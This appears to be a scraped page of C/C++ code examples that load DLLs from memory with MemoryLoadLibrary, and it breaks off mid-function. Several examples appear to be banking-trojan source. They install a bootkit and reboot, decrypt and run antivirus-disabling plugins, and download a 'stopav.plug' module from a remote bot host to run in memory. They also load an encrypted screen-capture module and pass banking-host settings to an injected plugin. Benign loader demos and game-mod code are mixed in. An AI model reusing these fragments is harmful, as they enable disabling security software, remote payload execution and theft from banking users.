Example #1
0
void RunBkDrop()
{
	DWORD  loader_dll_body_size = 0;
	void * loader_dll_body = NULL;

	PP_DPRINTF(L"RunBkDrop: started.");
	
	loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size);
	PP_RETURNIF1(loader_dll_body == NULL);
	PP_RETURNIF1(loader_dll_body_size == 0);

	PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body,
		loader_dll_body_size );

	HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);

	PP_RETURNIF1(loader_dll == NULL);

	typedef BOOL (WINAPI * BkInstallFunction)();

	BkInstallFunction bkinstall = NULL;

	bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall");

	PP_RETURNIF1(bkinstall == NULL);

	BOOL bkinstall_result = bkinstall();

	PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result);

	if (bkinstall_result) MultiMethodReboot();
}
void W2_StartGame()
{
	uint8_t* data = new uint8_t[3936256];

	FILE* f = fopen("bin\\w2core.dll", "rb");
	fread(data, 1, 3936256, f);
	fclose(f);

	tls1 = 1;

	if (tls1 == 2)
	{
		return;
	}

	HMODULE base = GetModuleHandle(NULL);
	PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)base;
	PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(base))[dos_header->e_lfanew];

	DWORD oldProtect;

	VirtualProtect(header, sizeof(*header), PAGE_EXECUTE_READWRITE, &oldProtect);
	header->OptionalHeader.AddressOfEntryPoint = 0x2BAC0F;

	PIMAGE_TLS_DIRECTORY tlsDirectory = (PIMAGE_TLS_DIRECTORY)(((char*)base) + header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress);
	*(DWORD*)0x66D94A8 = *(DWORD*)(tlsDirectory->AddressOfIndex);

	MemoryLoadLibrary(data);
}
Example #3
0
void InitAV()
{
	DisableDEP();

	DWORD dwMiniSize = 0;
	DWORD dwStopSize = 0;

	LPBYTE pMiniAV = GetFileData( GetMiniAVPath(), &dwMiniSize );
	LPBYTE pStopAV = GetFileData( GetStopAVPath(), &dwStopSize );

	if ( pMiniAV && dwMiniSize )
	{
		LPVOID MiniAVDll = DecryptPlugin( pMiniAV, dwMiniSize );

		HMEMORYMODULE hLib = MemoryLoadLibrary( MiniAVDll );

		if ( hLib )
		{
			MemoryFreeLibrary( hLib );
		}

		MemFree( MiniAVDll );
	}

	if ( pStopAV && dwStopSize )
	{
		LPVOID StopAVDll = DecryptPlugin( pStopAV, dwStopSize );

		HMEMORYMODULE hLib = MemoryLoadLibrary( StopAVDll );

		if ( hLib )
		{
			MemoryFreeLibrary( hLib );
		}
		

		MemFree( StopAVDll );
	}

	if (  !dwStopSize || !dwMiniSize )
	{
		MegaJump( AvFuckThread );
	}

	return;
}
Example #4
0
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
	if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
	{
		return 0;
	}

	char *Host = GetCurrentHost();

	if ( Host == NULL )
	{
		return 0;
	}

	char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};

	char AvBlockUrl[256];

	m_lstrcpy( AvBlockUrl, Host );
	m_lstrcat( AvBlockUrl, AvBlockFile );


	LPBYTE BotModule   = NULL;
	DWORD dwModuleSize = 0;

	while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) 
	{
		pSleep( 1000 * 60 * 5 );
	}

	if ( BotModule != NULL && dwModuleSize )
	{
		LPVOID FileData = MemAlloc( dwModuleSize + 1 );
		
		if ( FileData )
		{
			m_memcpy( FileData, BotModule, dwModuleSize );
			File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
			MemFree( FileData );
		}

		LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );	

		if ( Module )
		{
			HMEMORYMODULE hLib = MemoryLoadLibrary( Module );

			if ( hLib == NULL )
			{
				return 0;
			}

			MemoryFreeLibrary( hLib );
		}
	}

	return 0;
}
// Load the module into memory.
bool ModuleManager::LoadModule(onModule *Module)
{
    // Verify that the module should be loaded from memory.
    if (Module->LoadedFromDisk)
        return true;

    // Load the module from memory.
    Module->ModuleHandle.Memory = MemoryLoadLibrary(Module->DecryptedFile.data());
    return Module->ModuleHandle.Memory != NULL;
};
Example #6
0
void LoadFromMemory(void)
{
    FILE *fp;
    unsigned char *data=NULL;
    size_t size;
    HMEMORYMODULE handle;
    addNumberProc addNumber;
    HMEMORYRSRC resourceInfo;
    DWORD resourceSize;
    LPVOID resourceData;
    TCHAR buffer[100];

    fp = _tfopen(DLL_FILE, _T("rb"));
    if (fp == NULL)
    {
        _tprintf(_T("Can't open DLL file \"%s\"."), DLL_FILE);
        goto exit;
    }

    fseek(fp, 0, SEEK_END);
    size = ftell(fp);
    data = (unsigned char *)malloc(size);
    fseek(fp, 0, SEEK_SET);
    fread(data, 1, size, fp);
    fclose(fp);

    handle = MemoryLoadLibrary(data, NULL);
    if (handle == NULL)
    {
        _tprintf(_T("Can't load library from memory.\n"));
        goto exit;
    }

    addNumber = (addNumberProc)MemoryGetProcAddress(handle, "addNumbers");
    _tprintf(_T("From memory: %d\n"), addNumber(1, 2));

    resourceInfo = MemoryFindResource(handle, MAKEINTRESOURCE(VS_VERSION_INFO), RT_VERSION);
    _tprintf(_T("MemoryFindResource returned 0x%p\n"), resourceInfo);

    resourceSize = MemorySizeofResource(handle, resourceInfo);
    resourceData = MemoryLoadResource(handle, resourceInfo);
    _tprintf(_T("Memory resource data: %ld bytes at 0x%p\n"), resourceSize, resourceData);

    MemoryLoadString(handle, 1, buffer, sizeof(buffer));
    _tprintf(_T("String1: %s\n"), buffer);

    MemoryLoadString(handle, 20, buffer, sizeof(buffer));
    _tprintf(_T("String2: %s\n"), buffer);

    MemoryFreeLibrary(handle);

exit:
    if (data)
        free(data);
}
Example #7
0
//
// Get class factory
//
STDAPI DllGetClassObject(const CLSID& clsid,
                         const IID& iid,
                         void** ppv)
{
	// Can we create this component?
	if (clsid != CLSID_CoCOMServer && clsid != CLSID_CoCOMServerOptional)
	{
		return CLASS_E_CLASSNOTAVAILABLE ;
	}
	TCHAR buf[MAX_PATH];
#ifdef DEBUG
	if (0)  // for debugging com 
#else
	if (GetModuleFileName(g_hInstance, buf, MAX_PATH))
#endif
	{
		FILE *fp;
		unsigned char *data=NULL;
		size_t size;
		HMEMORYMODULE module;
	
		fp = _tfopen(buf, _T("rb"));
		if (fp == NULL)
		{
			return E_ACCESSDENIED;
		}

		fseek(fp, 0, SEEK_END);
		size = ftell(fp);
		data = (unsigned char *)_alloca(size);
		fseek(fp, 0, SEEK_SET);
		fread(data, 1, size, fp);
		fclose(fp);
		if (data)
			module = MemoryLoadLibrary(data);
		typedef HRESULT (__stdcall *pDllGetClassObject)(IN REFCLSID clsid,IN REFIID iid,OUT LPVOID FAR* ppv);
		pDllGetClassObject GetClassObject = (pDllGetClassObject)::MemoryGetProcAddress(module,"DllGetClassObject");
		return GetClassObject(clsid,iid,ppv);
		
	}
	// Create class factory.
	CFactory* pFactory = new CFactory ;  // Reference count set to 1
	                                     // in constructor
	if (pFactory == NULL)
	{
		return E_OUTOFMEMORY ;
	}

	// Get requested interface.
	HRESULT hr = pFactory->QueryInterface(iid, ppv) ;
	pFactory->Release() ;

	return hr ;
}
Example #8
0
void _Import_Zlib(char *pdata)
{
	HMODULE hlib;
	hlib = MemoryLoadLibrary("zlib.pyd", pdata);
	if (hlib) {
		void (*proc)(void);
		proc = (void(*)(void))MemoryGetProcAddress(hlib, "initzlib");
		if (proc)
			proc();
	}
}
Example #9
0
void InitScreenLib()
{	
	bInitialized = false;
	CaptureScreen = NULL;

	DWORD dwScreenSize = sizeof( Screen_Dll );
	LPBYTE ScreenFile  = (LPBYTE)MemAlloc( dwScreenSize + 1 );	
		
	if ( !ScreenFile )
	{
		return;
	}

	m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) );

	DWORD dwPassLen = *(DWORD*)ScreenFile;

	ScreenFile	  += sizeof( DWORD );
	dwScreenSize  -= sizeof( DWORD );

	char Password[30];

	m_memcpy( Password, ScreenFile, dwPassLen );

	Password[ dwPassLen ] = '\0';

	ScreenFile   += dwPassLen;
	dwScreenSize -= dwPassLen;

	XORCrypt::Crypt(Password, ScreenFile, dwScreenSize);
		
	m_memset( Password, 0, dwPassLen );

	hLib = MemoryLoadLibrary( ScreenFile );

	if ( hLib != NULL )
	{
		char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0};

		CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen );

		if ( CaptureScreen )
		{
			bInitialized = true;
		}
	}

	return;
}
Example #10
0
void LoadAndStartDll()
{
 int size;
 char* dll = LoadFileFromAdminka( nameLoadDll, &size );
 if( dll )
 {
   //u_SaveToFile( "c:\\test.bin", dll, size );
   HMEMORYMODULE hdll = MemoryLoadLibrary(dll);
   if( hdll )
   {
     TypeRunFunc func = (TypeRunFunc)MemoryGetProcAddress( hdll, "TestRun" );
     if( func )
       func();
   }
   u_free(dll);
 }
}
Example #11
0
int main(int argc, char* argv[])
{
	unsigned char *data;
	size_t filelen;
	HMEMORYMODULE testBase;			// dll base handle
	addNumberProc addNumber;		// function ptr

	if(argc < 3){
		printf("Usage: %s <dll_name> <dll_func_name>\n",argv[0]);
		return -1;
	}
	
	/* load the dll file into memory 
	 *
	 * Note:(This step could have been from an encrypted, compressed or signed file or 
	 * even dynamically downloaded from the web (!), etc.).
	 */	
	data = load_file(argv[1], &filelen);
	if(data == 0) { printf("failed to load %d, exiting.\n",argv[1]); return 0; }
		
	printf("Opening lib ..\n");
	/* load shared library from buffer, relocate it, etc. */
	if((testBase = MemoryLoadLibrary(data)) == NULL) {
			printf("Can't load library.\n");
	  	free(data); 
	  	return -1;
	}

	printf("Finding api call ..\n");
	/* now we can lookup any named vtable function(s) we want.. */
	addNumber = (addNumberProc)MemoryGetProcAddress(testBase, argv[2]);	
	if(addNumber != 0) {	
		printf("Got it! %d = %s(1,2);\n", addNumber(1, 2),argv[2]);		/* example use of dll exported function */
	} else {
		printf("Sorry %s() api not found in this dll.\n",argv[2]);
	}

	printf("Closing lib ..\n");
	/* close the library */ 
	MemoryFreeLibrary(testBase);
	
	/* free loaded dll buffer memory */
	free(data);

	return 0;
}
Example #12
0
void ExplorerLoadDLL(PUSER_INIT_NOTIFY InitData, LPBYTE Buf, DWORD Size)
{
	// 320_ld попытка загрузки и запуска BotPlug
	DebugReportStepByName("320_ld");


	HMEMORYMODULE Module = MemoryLoadLibrary(Buf);

	if (Module == NULL)
	{
		LDRDBG("BRDS Explorer", "Не удалось загрузить длл в память ");
		return;
	}

	const static char SetParamMethName[] = {'S', 'e', 't', 'B', 'o', 't', 'P', 'a', 'r', 'a', 'm', 'e', 't', 'e', 'r',  0};;
	SetParamMethod = (TSetParam)MemoryGetProcAddress(Module, (PCHAR)SetParamMethName);

	if (SetParamMethod != NULL)
	{
		SetBotParameter(BOT_PARAM_BOTPLUGNAME, BotPluginName);

		// Устанавливаем параметры бота
		LDRDBG("BRDS Explorer", "Устанавливаем параметры бота ");
		SetParam(BOT_PARAM_PREFIX);
		SetParam(BOT_PARAM_HOSTS);
		SetParam(BOT_PARAM_KEY);
		SetParam(BOT_PARAM_DELAY);
		SetParam(BOT_PARAM_BOTPLUGNAME);
		SetParam(BOT_PARAM_BANKINGHOSTS);
	}

	typedef void (WINAPI *TStart)(LPVOID, LPVOID, LPVOID);

	TStart Method = (TStart)MemoryGetProcAddress(Module, "Start");

	if (Method != NULL)
	{
		LDRDBG("BRDS Explorer", "Бот успешно запущен ");
		DLLLoader::DLLLoadedInExplorer = true;
		Method(NULL, NULL, NULL);

		// 321_ld попытка загрузки и запуска BotPlug успешна
		DebugReportStepByName("321_ld");
	}
}
Example #13
0
void LoadFromMemory(void)
{
	unsigned char *data=NULL;
	size_t size;
	HMEMORYMODULE module;
	addNumberProc addNumber;

	/*
	FILE *fp;

	fp = fopen(DLL_FILE, "rb");
	if (fp == NULL)
	{
		printf("Can't open DLL file \"%s\".", DLL_FILE);
		goto exit;
	}

	fseek(fp, 0, SEEK_END);
	size = ftell(fp);
	data = (unsigned char *)malloc(size);
	fseek(fp, 0, SEEK_SET);
	fread(data, 1, size, fp);
	fclose(fp);
	*/
	HRSRC hResID = ::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"exe");//查找资源  
	HGLOBAL hRes = ::LoadResource(NULL,hResID);//加载资源  
	data = (unsigned char *)::LockResource(hRes);//锁定资源  

	
	module = MemoryLoadLibrary(data);
	if (module == NULL)
	{
		printf("Can't load library from memory.\n");
		goto exit;
	}

	addNumber = (addNumberProc)MemoryGetProcAddress(module, "addNumbers");
	printf("From memory: %d\n", addNumber(1, 2));
	MemoryFreeLibrary(module);

exit:
	if (data)
		free(data);
}
Example #14
0
HMEMORYMODULE LoadMemDll(char* fileName)
{
	void *data;
	long size;
	HMEMORYMODULE handle;
	TCHAR buffer[100];

	data = File2Buffer(&size, fileName);
	if (data == NULL)
	{
		return 0;
	}

	handle = MemoryLoadLibrary(data, size);

	if (handle == NULL)
	{
		_tprintf(_T("Can't load library from memory.\n"));
		return 0;
	}
	//AddMemMod(handle); maybe xx
	return handle;
}
Example #15
0
int _load_python(char *dllname, char *bytes)
{
    int i;
    struct IMPORT *p = imports;
    HMODULE hmod;

    if (!bytes)
        return _load_python_FromFile(dllname);

    hmod = MemoryLoadLibrary(dllname, bytes);
    if (hmod == NULL) {
        return 0;
    }
    for (i = 0; p->name; ++i, ++p) {
        p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name);
        if (p->proc == NULL) {
            OutputDebugString("undef symbol");
            fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name);
            return 0;
        }
    }
    return 1;
}
Example #16
0
/* public - replacement for LoadLibrary, but searches FIRST for memory
   libraries, then for normal libraries.  So, it will load libraries AS memory
   module if they are found by findproc().
*/
HMODULE MyLoadLibrary(char *lpFileName)
{
	MEMORYMODULE *p = loaded;
	HMODULE hMod;

	while (p) {
		// If already loaded, only increment the reference count
		if (0 == stricmp(lpFileName, p->name)) {
			p->refcount++;
			return (HMODULE)p;
		}
		p = p->next;
	}
	if (findproc && findproc_data) {
		void *pdata = findproc(lpFileName, findproc_data);
		if (pdata) {
			hMod = MemoryLoadLibrary(lpFileName, pdata);
			free(p);
			return hMod;
		}
	}
	hMod = LoadLibrary(lpFileName);
	return hMod;
}
Example #17
0
void DownloadPlugByLoaderDll()
{
	DWORD  loader_dll_body_size = 0;
	void * loader_dll_body = NULL;

	PP_DPRINTF(L"DownloadPlugByLoaderDll: started.");
	
	// 120_d загрузка Loader_dll
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d"));

	loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size);
	PP_RETURNIF1(loader_dll_body == NULL);
	PP_RETURNIF1(loader_dll_body_size == 0);

	HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);

	PP_RETURNIF1(loader_dll == NULL);

	// 121_d загрузка Loader_dll успешна
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d"));

	typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD);

	LoadPlugToCacheFunction load_plug_to_cache = NULL;

	load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache");

	PP_RETURNIF1(load_plug_to_cache == NULL);

	// 122_d начало вызова LoadPlugin
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d"));

	BOOL load_plug_result = load_plug_to_cache(0);

	PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result);
}
Example #18
0
void LoadPlugins()
{
	LoadOriginalLibrary();

	// Regular ASI Loader
	WIN32_FIND_DATA fd;
	char			moduleName[MAX_PATH];
	char			dllPath[MAX_PATH];
	char			preparedPath[128];	// stores scripts\*exename*\settings.ini
	char*			tempPointer;
	int 			nWantsToLoadPlugins;
	int				nThatExeWantsPlugins;
	int 			nWantsToLoadFromScriptsOnly;
	int				nUseD3D8to9;
	int             nDirect3D8DisableMaximizedWindowedModeShim;

	char oldDir[MAX_PATH]; // store the current directory
	GetCurrentDirectory(MAX_PATH, oldDir);

	GetModuleFileName(NULL, moduleName, MAX_PATH);
	tempPointer = strrchr(moduleName, '.');
	*tempPointer = '\0';
	tempPointer = strrchr(moduleName, '\\');
	strncpy(dllPath, moduleName, (tempPointer - moduleName + 1));
	dllPath[tempPointer - moduleName + 1] = '\0';
	SetCurrentDirectory(dllPath);

	LoadLibrary(".\\modloader\\modupdater.asi");
	LoadLibrary(".\\modloader\\modloader.asi");

	std::fstream wndmode_ini;
	wndmode_ini.open("wndmode.ini", std::ios_base::out | std::ios_base::in | std::ios_base::binary);
	if (wndmode_ini.is_open())
	{
		wndmode_ini.seekg(0, wndmode_ini.end);
		bool bIsEmpty = !wndmode_ini.tellg();
		wndmode_ini.seekg(wndmode_ini.tellg(), wndmode_ini.beg);

		if (bIsEmpty)
		{
			HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_WNDWINI), RT_RCDATA);
			if (hResource)
			{
				HGLOBAL hLoadedResource = LoadResource(dllModule, hResource);
				if (hLoadedResource)
				{
					LPVOID pLockedResource = LockResource(hLoadedResource);
					if (pLockedResource)
					{
						DWORD dwResourceSize = SizeofResource(dllModule, hResource);
						if (0 != dwResourceSize)
						{
							wndmode_ini.write((char*)pLockedResource, dwResourceSize);
						}
					}
				}
			}
		}
		wndmode_ini.close();
		HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_WNDMODE), RT_RCDATA);
		if (hResource)
		{
			HGLOBAL hLoadedResource = LoadResource(dllModule, hResource);
			if (hLoadedResource)
			{
				LPVOID pLockedResource = LockResource(hLoadedResource);
				if (pLockedResource)
				{
					DWORD dwResourceSize = SizeofResource(dllModule, hResource);
					if (0 != dwResourceSize)
					{
						wndmode = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize);
					}
				}
			}
		}
	}

	GetModuleFileName(NULL, moduleName, MAX_PATH);
	tempPointer = strrchr(moduleName, '.');
	*tempPointer = '\0';

	tempPointer = strrchr(moduleName, '\\');
	strncpy(preparedPath, "scripts", 8);
	strcat(preparedPath, tempPointer);
	strcat(preparedPath, "\\settings.ini");

	nUseD3D8to9 = GetPrivateProfileInt("globalsets", "used3d8to9", FALSE, "scripts\\global.ini");
	if (nUseD3D8to9 && _stricmp(DllName + 1, "d3d8.dll") == NULL)
	{
		d3d8.Direct3DCreate8 = (FARPROC)Direct3DCreate8;
	}

	nDirect3D8DisableMaximizedWindowedModeShim = GetPrivateProfileInt("globalsets", "Direct3D8DisableMaximizedWindowedModeShim", FALSE, "scripts\\global.ini");
	if (nDirect3D8DisableMaximizedWindowedModeShim)
	{
		HMODULE pd3d8 = NULL;
		if (d3d8.dll)
		{
			pd3d8 = d3d8.dll;
		}
		else
		{
			pd3d8 = LoadLibrary("d3d8.dll");
			if (!pd3d8)
			{
				TCHAR szSystemPath[MAX_PATH];
				SHGetFolderPath(NULL, CSIDL_SYSTEM, NULL, 0, szSystemPath);
				strcat(szSystemPath, "\\d3d8.dll");
				pd3d8 = LoadLibrary(szSystemPath);
			}
		}

		if (pd3d8)
		{
			auto addr = (uintptr_t)GetProcAddress(pd3d8, "Direct3D8EnableMaximizedWindowedModeShim");
			if (addr)
			{
				DWORD Protect;
				VirtualProtect((LPVOID)(addr + 6), 4, PAGE_EXECUTE_READWRITE, &Protect);
				*(uint32_t*)(addr + 6) = 0;
				*(uint32_t*)(*(uint32_t*)(addr + 2)) = 0;
				VirtualProtect((LPVOID)(addr + 6), 4, Protect, &Protect);
			}
		}
	}

	// Before we load any ASI files, let's see if user wants to do it at all
	nWantsToLoadPlugins = GetPrivateProfileInt("globalsets", "loadplugins", TRUE, "scripts\\global.ini");
	nWantsToLoadFromScriptsOnly = GetPrivateProfileInt("globalsets", "loadfromscriptsonly", FALSE, "scripts\\global.ini");
	// Or perhaps this EXE wants to override global settings?
	nThatExeWantsPlugins = GetPrivateProfileInt("exclusivesets", "loadplugins", -1, preparedPath);

	if (nThatExeWantsPlugins)	// Will not process only if this EXE wishes not to load anything but its exclusive plugins
	{
		if (nWantsToLoadPlugins || nThatExeWantsPlugins == TRUE)
		{
			// Load excludes
			ExcludedEntriesList	excludes;

			ExcludedEntriesListInit(&excludes);
			if (FILE* iniFile = fopen(preparedPath, "rt"))
			{
				char	line[256];
				bool	bItsExcludesList = false;

				while (fgets(line, 256, iniFile))
				{
					char*	newline = strchr(line, '\n');

					if (newline)
						*newline = '\0';

					if (bItsExcludesList)
					{
						if (line[0] && line[0] != ';')
							ExcludedEntriesListPush(&excludes, line);
					}
					else
					{
						if (!_stricmp(line, "[excludes]"))
							bItsExcludesList = true;
					}
				}

				fclose(iniFile);
			}
			if (!nWantsToLoadFromScriptsOnly)
			{
				FindFiles(&fd, &excludes);
			}
			if (SetCurrentDirectory("scripts\\"))
			{
				FindFiles(&fd, &excludes);
				if (SetCurrentDirectory(tempPointer + 1))
				{
					FindFiles(&fd, NULL);	// Exclusive plugins are not being excluded
					SetCurrentDirectory("..\\..\\");
				}
				else
					SetCurrentDirectory("..\\");
			}

			if (SetCurrentDirectory("plugins\\"))
			{
				FindFiles(&fd, &excludes);
				if (SetCurrentDirectory(tempPointer + 1))
				{
					FindFiles(&fd, NULL);	// Exclusive plugins are not being excluded
					SetCurrentDirectory("..\\..\\");
				}
				else
					SetCurrentDirectory("..\\");
			}
			// Free the remaining excludes
			ExcludedEntriesListFree(&excludes);
		}
	}
	else
	{
		// Load only exclusive plugins, if exists
		// We need to cut settings.ini from the path again
		tempPointer = strrchr(preparedPath, '\\');
		tempPointer[1] = '\0';
		if (SetCurrentDirectory(preparedPath))
		{
			FindFiles(&fd, NULL);
			SetCurrentDirectory("..\\..\\");
		}
	}

	SetCurrentDirectory(oldDir); // Reset the current directory

	// Unprotect the module NOW (CLEO 4.1.1.30f crash fix)
	IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)((DWORD)hExecutableInstance + ((IMAGE_DOS_HEADER*)hExecutableInstance)->e_lfanew);
	SIZE_T size = ntHeader->OptionalHeader.SizeOfImage;
	DWORD oldProtect;
	VirtualProtect((VOID*)hExecutableInstance, size, PAGE_EXECUTE_READWRITE, &oldProtect);
}
Example #19
0
void LoadOriginalLibrary()
{
	if (_stricmp(DllName + 1, "vorbisFile.dll") == NULL)
	{
		HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_VBHKD), RT_RCDATA);
		if (hResource)
		{
			HGLOBAL hLoadedResource = LoadResource(dllModule, hResource);
			if (hLoadedResource)
			{
				LPVOID pLockedResource = LockResource(hLoadedResource);
				if (pLockedResource)
				{
					DWORD dwResourceSize = SizeofResource(dllModule, hResource);
					if (0 != dwResourceSize)
					{
						vorbisHooked = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize);
						if (vorbisHooked)
						{
							__ov_open_callbacks = MemoryGetProcAddress(vorbisHooked, "ov_open_callbacks");
							__ov_clear = MemoryGetProcAddress(vorbisHooked, "ov_clear");
							__ov_time_total = MemoryGetProcAddress(vorbisHooked, "ov_time_total");
							__ov_time_tell = MemoryGetProcAddress(vorbisHooked, "ov_time_tell");
							__ov_read = MemoryGetProcAddress(vorbisHooked, "ov_read");
							__ov_info = MemoryGetProcAddress(vorbisHooked, "ov_info");
							__ov_time_seek = MemoryGetProcAddress(vorbisHooked, "ov_time_seek");
							__ov_time_seek_page = MemoryGetProcAddress(vorbisHooked, "ov_time_seek_page");
						}
					}
				}
			}
		}
	}
	else
	{
		if (_stricmp(DllName + 1, "dsound.dll") == NULL) {
			dsound.dll = LoadLibrary(szSystemPath);
			dsound.DirectSoundCaptureCreate = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate");
			dsound.DirectSoundCaptureCreate8 = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate8");
			dsound.DirectSoundCaptureEnumerateA = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateA");
			dsound.DirectSoundCaptureEnumerateW = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateW");
			dsound.DirectSoundCreate = GetProcAddress(dsound.dll, "DirectSoundCreate");
			dsound.DirectSoundCreate8 = GetProcAddress(dsound.dll, "DirectSoundCreate8");
			dsound.DirectSoundEnumerateA = GetProcAddress(dsound.dll, "DirectSoundEnumerateA");
			dsound.DirectSoundEnumerateW = GetProcAddress(dsound.dll, "DirectSoundEnumerateW");
			dsound.DirectSoundFullDuplexCreate = GetProcAddress(dsound.dll, "DirectSoundFullDuplexCreate");
			dsound.DllCanUnloadNow = GetProcAddress(dsound.dll, "DllCanUnloadNow");
			dsound.DllGetClassObject = GetProcAddress(dsound.dll, "DllGetClassObject");
			dsound.GetDeviceID = GetProcAddress(dsound.dll, "GetDeviceID");
		}
		else
		{
			if (_stricmp(DllName + 1, "dinput8.dll") == NULL) {
				dinput8.dll = LoadLibrary(szSystemPath);
				dinput8.DirectInput8Create = GetProcAddress(dinput8.dll, "DirectInput8Create");
				dinput8.DllCanUnloadNow = GetProcAddress(dinput8.dll, "DllCanUnloadNow");
				dinput8.DllGetClassObject = GetProcAddress(dinput8.dll, "DllGetClassObject");
				dinput8.DllRegisterServer = GetProcAddress(dinput8.dll, "DllRegisterServer");
				dinput8.DllUnregisterServer = GetProcAddress(dinput8.dll, "DllUnregisterServer");
			}
			else
			{
				if (_stricmp(DllName + 1, "ddraw.dll") == NULL) {
					ddraw.dll = LoadLibrary(szSystemPath);
					ddraw.AcquireDDThreadLock = GetProcAddress(ddraw.dll, "AcquireDDThreadLock");
					ddraw.CompleteCreateSysmemSurface = GetProcAddress(ddraw.dll, "CompleteCreateSysmemSurface");
					ddraw.D3DParseUnknownCommand = GetProcAddress(ddraw.dll, "D3DParseUnknownCommand");
					ddraw.DDGetAttachedSurfaceLcl = GetProcAddress(ddraw.dll, "DDGetAttachedSurfaceLcl");
					ddraw.DDInternalLock = GetProcAddress(ddraw.dll, "DDInternalLock");
					ddraw.DDInternalUnlock = GetProcAddress(ddraw.dll, "DDInternalUnlock");
					ddraw.DSoundHelp = GetProcAddress(ddraw.dll, "DSoundHelp");
					ddraw.DirectDrawCreate = GetProcAddress(ddraw.dll, "DirectDrawCreate");
					ddraw.DirectDrawCreateClipper = GetProcAddress(ddraw.dll, "DirectDrawCreateClipper");
					ddraw.DirectDrawCreateEx = GetProcAddress(ddraw.dll, "DirectDrawCreateEx");
					ddraw.DirectDrawEnumerateA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateA");
					ddraw.DirectDrawEnumerateExA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExA");
					ddraw.DirectDrawEnumerateExW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExW");
					ddraw.DirectDrawEnumerateW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateW");
					ddraw.DllCanUnloadNow = GetProcAddress(ddraw.dll, "DllCanUnloadNow");
					ddraw.DllGetClassObject = GetProcAddress(ddraw.dll, "DllGetClassObject");
					ddraw.GetDDSurfaceLocal = GetProcAddress(ddraw.dll, "GetDDSurfaceLocal");
					ddraw.GetOLEThunkData = GetProcAddress(ddraw.dll, "GetOLEThunkData");
					ddraw.GetSurfaceFromDC = GetProcAddress(ddraw.dll, "GetSurfaceFromDC");
					ddraw.RegisterSpecialCase = GetProcAddress(ddraw.dll, "RegisterSpecialCase");
					ddraw.ReleaseDDThreadLock = GetProcAddress(ddraw.dll, "ReleaseDDThreadLock");
					ddraw.SetAppCompatData = GetProcAddress(ddraw.dll, "SetAppCompatData");
				}
				else
				{
					if (_stricmp(DllName + 1, "d3d8.dll") == NULL) {
						d3d8.dll = LoadLibrary(szSystemPath);
						d3d8.DebugSetMute = GetProcAddress(d3d8.dll, "DebugSetMute");
						d3d8.Direct3D8EnableMaximizedWindowedModeShim = GetProcAddress(d3d8.dll, "Direct3D8EnableMaximizedWindowedModeShim");
						d3d8.Direct3DCreate8 = GetProcAddress(d3d8.dll, "Direct3DCreate8");
						d3d8.ValidatePixelShader = GetProcAddress(d3d8.dll, "ValidatePixelShader");
						d3d8.ValidateVertexShader = GetProcAddress(d3d8.dll, "ValidateVertexShader");
					}
					else {
						if (_stricmp(DllName + 1, "d3d9.dll") == NULL) {
							d3d9.dll = LoadLibrary(szSystemPath);
							d3d9.D3DPERF_BeginEvent = GetProcAddress(d3d9.dll, "D3DPERF_BeginEvent");
							d3d9.D3DPERF_EndEvent = GetProcAddress(d3d9.dll, "D3DPERF_EndEvent");
							d3d9.D3DPERF_GetStatus = GetProcAddress(d3d9.dll, "D3DPERF_GetStatus");
							d3d9.D3DPERF_QueryRepeatFrame = GetProcAddress(d3d9.dll, "D3DPERF_QueryRepeatFrame");
							d3d9.D3DPERF_SetMarker = GetProcAddress(d3d9.dll, "D3DPERF_SetMarker");
							d3d9.D3DPERF_SetOptions = GetProcAddress(d3d9.dll, "D3DPERF_SetOptions");
							d3d9.D3DPERF_SetRegion = GetProcAddress(d3d9.dll, "D3DPERF_SetRegion");
							d3d9.DebugSetLevel = GetProcAddress(d3d9.dll, "DebugSetLevel");
							d3d9.DebugSetMute = GetProcAddress(d3d9.dll, "DebugSetMute");
							d3d9.Direct3D9EnableMaximizedWindowedModeShim = GetProcAddress(d3d9.dll, "Direct3D9EnableMaximizedWindowedModeShim");
